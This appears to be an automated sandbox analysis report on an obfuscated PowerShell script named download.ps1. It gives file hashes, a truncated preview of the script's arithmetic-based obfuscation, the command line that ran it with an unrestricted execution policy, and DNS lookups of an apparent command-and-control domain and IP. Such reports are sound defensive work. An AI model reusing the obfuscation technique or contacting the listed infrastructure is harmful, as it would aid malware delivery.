                                  SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                  SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                  Malicious:false
                                  Reputation:high, very likely benign file
                                  Preview:@...e...........................................................
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Reputation:high, very likely benign file
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Reputation:high, very likely benign file
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Reputation:high, very likely benign file
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):6222
                                  Entropy (8bit):3.7351045580281332
                                  Encrypted:false
                                  SSDEEP:96:Eq386C2GHSkvhkvCCtWbPHsNHdbPHs4Hm:l36uyPMXPMj
                                  MD5:51F639D524222C5434E04918A8554F26
                                  SHA1:A8967382B0C09EE521EF8D0183D8BF88B5126FA1
                                  SHA-256:5134FCD8FBE8EC729426945192987EE5F7B3A0BCD49780A4234A889BA5968298
                                  SHA-512:D663B96EAAD5D98BDE82CAE583C4CA3D66CF3118DF53C444318871F1E2BD32BEFB2A51A459ED22929907AF7D2CE1C5D39712FAECFA7ACDA1C02627166FA5E9B3
                                  Malicious:false
                                  Preview:...................................FL..................F.".. ...;.}.S.....r.R..z.:{.............................:..DG..Yr?.D..U..k0.&...&........{.S...o..k.R.....r.R......t...CFSF..1....."S...AppData...t.Y^...H.g.3..(.....gVA.G..k...@......"S.Y[d....B......................A!.A.p.p.D.a.t.a...B.V.1......Yad..Roaming.@......"S.Yad....D.....................(.~.R.o.a.m.i.n.g.....\.1.....6S.T..MICROS~1..D......"S.Y[d....E.......................(.M.i.c.r.o.s.o.f.t.....V.1......YY4..Windows.@......"S.Y[d....F.........................W.i.n.d.o.w.s.......1....."SN...STARTM~1..n.......S)`.YZ4....H...............D.........S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....6S.S..Programs..j.......S)`.YZ4....I...............@.....f...P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1....."S....WINDOW~1..V......"S.Yi+....J.......................O.W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......"S.Ygd....i...........
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):6222
                                  Entropy (8bit):3.7351045580281332
                                  Encrypted:false
                                  SSDEEP:96:Eq386C2GHSkvhkvCCtWbPHsNHdbPHs4Hm:l36uyPMXPMj
                                  MD5:51F639D524222C5434E04918A8554F26
                                  SHA1:A8967382B0C09EE521EF8D0183D8BF88B5126FA1
                                  SHA-256:5134FCD8FBE8EC729426945192987EE5F7B3A0BCD49780A4234A889BA5968298
                                  SHA-512:D663B96EAAD5D98BDE82CAE583C4CA3D66CF3118DF53C444318871F1E2BD32BEFB2A51A459ED22929907AF7D2CE1C5D39712FAECFA7ACDA1C02627166FA5E9B3
                                  Malicious:false
                                  Preview:...................................FL..................F.".. ...;.}.S.....r.R..z.:{.............................:..DG..Yr?.D..U..k0.&...&........{.S...o..k.R.....r.R......t...CFSF..1....."S...AppData...t.Y^...H.g.3..(.....gVA.G..k...@......"S.Y[d....B......................A!.A.p.p.D.a.t.a...B.V.1......Yad..Roaming.@......"S.Yad....D.....................(.~.R.o.a.m.i.n.g.....\.1.....6S.T..MICROS~1..D......"S.Y[d....E.......................(.M.i.c.r.o.s.o.f.t.....V.1......YY4..Windows.@......"S.Y[d....F.........................W.i.n.d.o.w.s.......1....."SN...STARTM~1..n.......S)`.YZ4....H...............D.........S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....6S.S..Programs..j.......S)`.YZ4....I...............@.....f...P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1....."S....WINDOW~1..V......"S.Yi+....J.......................O.W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......"S.Ygd....i...........
                                  File type:ASCII text, with very long lines (10876), with CRLF line terminators
                                  Entropy (8bit):6.0111175419643885
                                  TrID:
                                    File name:download.ps1
                                    File size:19'439 bytes
                                    MD5:f91e3c78bfc0cc41330d65764455a851
                                    SHA1:294c15d09a7df4d91e891d7ca3bc2803c8262ce1
                                    SHA256:3cef01524b94194e6e6834746b8215ebdd4b51c29e92187d6e59e8be1b365934
                                    SHA512:1899a3848c18343b39e0a3cb5887b777e270a032f7447e9554c94a4a757cb05623e3b17c5da1bd3fb43ee2f16a0da64a71e12c99fc81efc86e533c0927b0e700
                                    SSDEEP:384:fD6lYFayIXH9VxzwZ3XPOsGhJ06ZLpAg1cHsf4ftu1vrNpjuFLP2TdQiGo/N:fOlYUyqps3XWfuIVAru1vrNZuURQiGo1
                                    TLSH:F5927EC837C8E8E1C6CD967ED90A7C087762383AD4D56FC0F398D5C563AA294ABD8C40
                                    File Content Preview:$cvdkoxwrnfj=$executioncontext;$inenatreerbealentionerinaten = ([ChAR[]]@((640-(5571804/(52357872/(12327-(54379024/7984))))),(-9718+(93713840/(61561456/6418))),(553812/(18051-(55511100/(61505100/(263+(14980-6008)))))),(9327-9277),(9128/(9681-(72079814/(36
                                    Icon Hash:3270d6baae77db44
                                    TimestampSource PortDest PortSource IPDest IP
                                    Dec 19, 2024 13:35:15.288777113 CET5042653192.168.11.201.1.1.1
                                    Dec 19, 2024 13:35:16.300379992 CET5042653192.168.11.209.9.9.9
                                    Dec 19, 2024 13:35:16.429333925 CET53504269.9.9.9192.168.11.20
                                    Dec 19, 2024 13:35:20.600438118 CET53504261.1.1.1192.168.11.20
                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                    Dec 19, 2024 13:35:15.288777113 CET192.168.11.201.1.1.10x961dStandard query (0)cmacnnkfbhlcncm.topA (IP address)IN (0x0001)false
                                    Dec 19, 2024 13:35:16.300379992 CET192.168.11.209.9.9.90x961dStandard query (0)cmacnnkfbhlcncm.topA (IP address)IN (0x0001)false
                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                    Dec 19, 2024 13:35:16.429333925 CET9.9.9.9192.168.11.200x961dName error (3)cmacnnkfbhlcncm.topnonenoneA (IP address)IN (0x0001)false
                                    Dec 19, 2024 13:35:20.600438118 CET1.1.1.1192.168.11.200x961dNo error (0)cmacnnkfbhlcncm.top45.61.136.138A (IP address)IN (0x0001)false

                                    Click to jump to process

                                    Click to jump to process

                                    Click to dive into process behavior distribution

                                    Click to jump to process

                                    Target ID:0
                                    Start time:07:35:12
                                    Start date:19/12/2024
                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1"
                                    Imagebase:0x7ff7883f0000
                                    File size:452'608 bytes
                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:1
                                    Start time:07:35:12
                                    Start date:19/12/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff73a550000
                                    File size:875'008 bytes
                                    MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Reset < >
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.41069591854.00007FF8D1B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8D1B10000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff8d1b10000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 9f67153f224a17059e117a1bb100cafae93a9030b815e1fd58410976c2acef4d
                                      • Instruction ID: 888ca2df5f9c3a8da42a6595fa546a145f4836eb73d8eca46df134e32bc471c1
                                      • Opcode Fuzzy Hash: 9f67153f224a17059e117a1bb100cafae93a9030b815e1fd58410976c2acef4d
                                      • Instruction Fuzzy Hash: 39F19430909E8E8FEBA4EF28C845BED3BD1FF58310F54426ED84DC7291DA78A9458781
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.41069591854.00007FF8D1B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8D1B10000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff8d1b10000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 69f8316985e1b842439a5a77fc9b48dd732bb2be7b186ea0b7c76f60753bb7e1
                                      • Instruction ID: 18076e9c6ae0b4c2062da08ff326e1bbde97c42faf0c0743cfc05643aea98b03
                                      • Opcode Fuzzy Hash: 69f8316985e1b842439a5a77fc9b48dd732bb2be7b186ea0b7c76f60753bb7e1
                                      • Instruction Fuzzy Hash: 4FE1C230A09E8E4FEBA8EF28C8557ED3BD1EF54350F54426ED84DC7291CB78A8858781
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.41072791374.00007FF8D1D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8D1D80000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff8d1d80000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: ?6_H$BNs$Xz$Xz$Xz$p!
                                      • API String ID: 0-1452262832
                                      • Opcode ID: 3d05eb94e2a80eaad38adaaeff00ddd44092d2f6caeedefd86704c18a97bad11
                                      • Instruction ID: 07e11113e216ea8d98a7fdfb3f45c48ae5b5397a0e7a8e40336e365a941aff9c
                                      • Opcode Fuzzy Hash: 3d05eb94e2a80eaad38adaaeff00ddd44092d2f6caeedefd86704c18a97bad11
                                      • Instruction Fuzzy Hash: 4F82A132E0CA8A4FFB95EB2884556687BE1FF65364F5801BEC04DC7293DE29AC45CB41
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.41069591854.00007FF8D1B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8D1B10000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff8d1b10000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 201b2656ec2b47a738c73b2c0b4824b7ca209f73a2d131c3557e45eacf28833a
                                      • Instruction ID: 7f54fd992a36a626d349e2d926298456d54fbd18df13c0f96e8bd36f4786f46e
                                      • Opcode Fuzzy Hash: 201b2656ec2b47a738c73b2c0b4824b7ca209f73a2d131c3557e45eacf28833a
                                      • Instruction Fuzzy Hash: F1C14C30A08D4E8FEF95EF58C495AADBBE1FFA8350F15416AD40DD7295DA34E881CB80
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.41069591854.00007FF8D1B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8D1B10000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff8d1b10000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 22c3a61526984bef6e61f02c7d9f31f9c769fc82d6a7737538e6ec27a2b579fe
                                      • Instruction ID: d4a1cd7a2c881905f609860ba5ec66d3b27e70437387b9a1d7ba27b5d1ad4ef6
                                      • Opcode Fuzzy Hash: 22c3a61526984bef6e61f02c7d9f31f9c769fc82d6a7737538e6ec27a2b579fe
                                      • Instruction Fuzzy Hash: 6AB1D630A08E4E4FEBA9DF28D8457ED3BD1EF55350F54426EE44DC7292CE74A8858B82
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.41069591854.00007FF8D1B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8D1B10000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff8d1b10000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 0af51b50c3b98e309ec182f6b3ae425aca0c7a1d947d83322c096d99d97a8508
                                      • Instruction ID: c82719c347cbd668cabb2aa7e1dda5be6da32c03f944bb3f30808ee0f76a7932
                                      • Opcode Fuzzy Hash: 0af51b50c3b98e309ec182f6b3ae425aca0c7a1d947d83322c096d99d97a8508
                                      • Instruction Fuzzy Hash: 4F21913794EEC68FF7818F6458591A83FA0FF552407D911FBD8888B2A7E625EE08C341
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.41069591854.00007FF8D1B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8D1B10000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff8d1b10000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: a6b2ef7e0e9f13e75f48ee552768628c02d8cffc4d41f70f1eb3666c0df316e0
                                      • Instruction ID: efb94cf97c951830cccd9d26e1ff86909c2970208f607c52bc709c3ccd74cfe8
                                      • Opcode Fuzzy Hash: a6b2ef7e0e9f13e75f48ee552768628c02d8cffc4d41f70f1eb3666c0df316e0
                                      • Instruction Fuzzy Hash: 98118E7184E7C54FDB479B344C650943FB09E23240B1A02DBD485CB1E3DA699809C7A2
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.41069591854.00007FF8D1B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8D1B10000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff8d1b10000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 833e5c3897657da9ee90e56d5a44fe9b462e9c77f124d35ba961377c9539c4fc
                                      • Instruction ID: 17af1344562e40710040bdb6daeb57bf4b6232bc96c6b16e3186008fe94382c4
                                      • Opcode Fuzzy Hash: 833e5c3897657da9ee90e56d5a44fe9b462e9c77f124d35ba961377c9539c4fc
                                      • Instruction Fuzzy Hash: C0713B6290EFC24FE3429B2CAC551E9BFA0FF462A4B8401FBC1D5C7093DA19641AC792
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.41069072259.00007FF8D19FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8D19FD000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff8d19fd000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 4c4478be963e72157d9c41fe7913b5fe06db488c253e8f461c4769d505648c6e
                                      • Instruction ID: c39902f509beba576ba30fd17d80f2e5674b596c931e685af46788515def5ff6
                                      • Opcode Fuzzy Hash: 4c4478be963e72157d9c41fe7913b5fe06db488c253e8f461c4769d505648c6e
                                      • Instruction Fuzzy Hash: 2F41287180DFC46FE7568F28A8459563FF0EF53324B1605DFD088CB1A3DA25A846C792
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.41069591854.00007FF8D1B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8D1B10000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff8d1b10000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 7354a00fbd6a3b40fd43fd0dadf9acde9f96d43c447b5e961e8c5302f13d6fe3
                                      • Instruction ID: 31a1c04112887fad43d1be2392bfaf2b1877461b4f837f70dfb9033154f47a05
                                      • Opcode Fuzzy Hash: 7354a00fbd6a3b40fd43fd0dadf9acde9f96d43c447b5e961e8c5302f13d6fe3
                                      • Instruction Fuzzy Hash: 0E31A23191CF4C9FDB58DB4C98466A97BE0FBA9321F00422FE449D3251DB71B8568BC2
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.41069591854.00007FF8D1B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8D1B10000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff8d1b10000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 7f969c99cbbc61dc615666e4dc4157782e082c9b0b0bf87418285a0991bd340e
                                      • Instruction ID: e4ecdcb127328cc0b69b47b271aa8819e6424d7908a2adef4c6e87355f5b84cd
                                      • Opcode Fuzzy Hash: 7f969c99cbbc61dc615666e4dc4157782e082c9b0b0bf87418285a0991bd340e
                                      • Instruction Fuzzy Hash: B921383090CA4C4FEB68DB6C984A7E97BE0EF96331F04426FD059C31A6DA74545BCB91
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.41069591854.00007FF8D1B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8D1B10000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff8d1b10000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: a9e1ec3979f52949ec3ba3e30f62314311fe11c2cf3b7948dd6ad856378f5f58
                                      • Instruction ID: 62c8b6afcd77aa7892762ef157a45f62ebfacfc2df104981f756b094b8be3783
                                      • Opcode Fuzzy Hash: a9e1ec3979f52949ec3ba3e30f62314311fe11c2cf3b7948dd6ad856378f5f58
                                      • Instruction Fuzzy Hash: 4631F63095AE4E8EFBB4AB14DC4ABFD36D1FF42355F80213AD40D86092CA786989CB51
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.41069591854.00007FF8D1B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8D1B10000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff8d1b10000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: bce0cc068c40f6a0ee7a4a359225e820c7e8998170eada5f6cef819f62286abe
                                      • Instruction ID: 06b4bd5c612304b3d927e780f9da950d3c8a12a134a2036493705dbb50df4178
                                      • Opcode Fuzzy Hash: bce0cc068c40f6a0ee7a4a359225e820c7e8998170eada5f6cef819f62286abe
                                      • Instruction Fuzzy Hash: 5921D83151CF4A4FE759DF18D455AB9BBE0FF9A310F10057EE08EC35A6DA26A882CB41
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.41073170728.00007FF8D1DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8D1DC0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff8d1dc0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b003b1509aba2e4bbdb2db242153a39840e6f597c935a12a02fd1dd1acc73a1c
                                      • Instruction ID: 670dcac4b2ffd1c44b23e0571697a16a5809f1f27e85820ea7769cb19fe40bee
                                      • Opcode Fuzzy Hash: b003b1509aba2e4bbdb2db242153a39840e6f597c935a12a02fd1dd1acc73a1c
                                      • Instruction Fuzzy Hash: F9F03032A0C9554FE758EB4CE4415A877E2FF4936071800B7E14DC7567DA26AC41CB91
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.41073170728.00007FF8D1DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8D1DC0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_7ff8d1dc0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 6994cc8c443382564813c710aecae8de7ae80cc17fad476751a039812ee8639c
                                      • Instruction ID: 8cc00d5ff1837b94c5469526869e248877b4da6b37e1e05be10aa8b7fefe352e
                                      • Opcode Fuzzy Hash: 6994cc8c443382564813c710aecae8de7ae80cc17fad476751a039812ee8639c
                                      • Instruction Fuzzy Hash: 0FF05832A0C9558FE798EB4CE4419A87BE1FF49364B1400B7E049CB563CB2AEC85DB90